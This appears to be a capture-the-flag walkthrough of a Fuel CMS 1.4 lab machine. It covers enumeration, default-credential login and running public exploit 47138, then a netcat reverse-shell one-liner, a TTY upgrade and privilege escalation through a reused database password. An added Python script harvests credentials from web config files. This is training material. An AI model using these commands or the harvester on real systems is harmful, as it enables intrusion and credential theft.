[Enumeration]
1. Port scan
nmap -Pn <ip>
nmap -Pn -p1000- <ip>
The first scan covers nmap's default top 1000 ports; the second covers ports 1000 to 65535 so nothing higher is missed.
2. OS and services scan
nmap -A -p 80 <ip>
The machine runs Ubuntu.
The HTTP site is likely running Fuel CMS.
There is a robots.txt file on this site.
3. Vulnerability scan
nmap --script vuln <ip>
4. Access the HTTP site
It looks like the CMS has only just been installed.
The version is 1.4.
There is a database configuration file.
The default credential is "admin:admin".
Access the login page, which is also listed in robots.txt.
Try admin:admin.
Here's the dashboard.
Accessing the other pages reported by the vulnerability scan gives the same result.
[Exploitation]
1. Search for public exploits
searchsploit fuel cms
Copy it to the working directory
searchsploit -m 47138
2. Review the code
It looks like I have to set the target IP, and the script sends its requests through a Burp Suite proxy.
3. Replace the URL with the target IP
4. Open Burp Suite. I'll turn intercept off first.
5. Run the script
python 47138.py
The exploit seems to work.
Test a command:
whoami
6. Reverse shell
Create a listener
nc -lvp 1234
Pass a reverse shell command
Reference: http://pentestmonkey.net/cheat-sheet/shells/reverse-shell-cheat-sheet
I tried many commands, but I succeeded with this one:
rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc <ip> 1234 >/tmp/f
Back at the listener, I now have a shell.
7. TTY shell
python -c 'import pty;pty.spawn("/bin/bash");'
8. Read user.txt
cd /home
ls
cd www-data
ls
cat flag.txt
9. Privilege escalation
Check the users
cat /etc/passwd
The only real user seems to be "root".
SUID
find / -perm -u=s -type f 2>/dev/null
Nothing useful
Kernel
uname -a
Nothing useful
Cron
cat /etc/crontab
Nothing useful
It looks like there is nothing else I can do, but I remember that the CMS has a config file. I may be able to grab credentials from it.
cat /var/www/html/fuel/application/config/database.php
Credentials: "root:mememe"
The database password is worth trying against the root account, in case it has been reused. Let's try logging in as root.
su -
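The config-file credential search from the privilege-escalation step, as an added example that is not part of the original writeup. It parses the CodeIgniter-style database.php that Fuel CMS uses and walks a web root for other config files; the sample file contents, the list of config file names, and the database name are assumptions made for the demo, and the target path is the one the writeup reads.

```python
"""Harvest database credentials from CodeIgniter-style config files.

Added example for the privilege-escalation step; not part of the original
writeup. Fuel CMS runs on CodeIgniter, whose database.php stores
$db['default'] = array('hostname' => ..., 'username' => ..., 'password' => ...).
On the target that file is /var/www/html/fuel/application/config/database.php;
the sample below is constructed for the demo, and the list of config file
names is an assumption, not something the writeup checked.
"""
import os
import re
import tempfile

# 'key' => 'value' pairs, single- or double-quoted.
PAIR_RE = re.compile(r"""['"](\w+)['"]\s*=>\s*['"]([^'"]*)['"]""")
# The $db['default'] = array( ... ); block.
DEFAULT_DB_RE = re.compile(r"\$db\[\s*['\"]default['\"]\s*\]\s*=\s*array\s*\((.*?)\);", re.S)
# Config file names worth reading under a web root (assumed list, not exhaustive).
CONFIG_NAMES = {"database.php", "config.php", "wp-config.php", ".env"}

SAMPLE_DATABASE_PHP = """<?php
$active_group = 'default';
$db['default'] = array(
    'dsn'      => '',
    'hostname' => 'localhost',
    'username' => 'root',
    'password' => 'mememe',
    'database' => 'fuel_cms',
    'dbdriver' => 'mysqli',
);
"""  # constructed sample; username/password mirror what the writeup found


def parse_codeigniter_db(text: str) -> dict:
    """Return hostname/username/password/database from $db['default']."""
    m = DEFAULT_DB_RE.search(text)
    block = m.group(1) if m else text          # fall back to scanning the whole file
    pairs = dict(PAIR_RE.findall(block))
    return {k: pairs.get(k, "") for k in ("hostname", "username", "password", "database")}


def find_config_files(root: str):
    """Yield paths under `root` whose file name is in CONFIG_NAMES."""
    for dirpath, _dirs, files in os.walk(root):
        for name in files:
            if name in CONFIG_NAMES:
                yield os.path.join(dirpath, name)


def harvest(root: str) -> list:
    """Return (path, creds) for every config file that yields a username or password."""
    found = []
    for path in find_config_files(root):
        try:
            with open(path, encoding="utf-8", errors="replace") as fh:
                text = fh.read()
        except OSError:
            continue                           # unreadable as www-data; move on
        creds = parse_codeigniter_db(text)
        if creds["username"] or creds["password"]:
            found.append((path, creds))
    return found


def demo() -> list:
    """Build a throwaway web root holding the sample file and harvest it."""
    with tempfile.TemporaryDirectory() as root:
        cfg_dir = os.path.join(root, "html", "fuel", "application", "config")
        os.makedirs(cfg_dir)
        with open(os.path.join(cfg_dir, "database.php"), "w", encoding="utf-8") as fh:
            fh.write(SAMPLE_DATABASE_PHP)
        return harvest(root)


if __name__ == "__main__":
    import sys
    root = sys.argv[1] if len(sys.argv) > 1 else "/var/www"
    for path, creds in harvest(root):
        print(f"{path}: {creds['username']}:{creds['password']}@{creds['hostname']}/{creds['database']}")
```

On the box this would be run as `python3 harvest.py /var/www` from the www-data shell; the `demo()` function exercises the same code against the constructed sample without touching the real filesystem. The point of the step is credential reuse: a database password that also works for `su -` is a finding to report independently of the CMS bug.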
10. Read root.txt
cd /root
ls
cat root.txt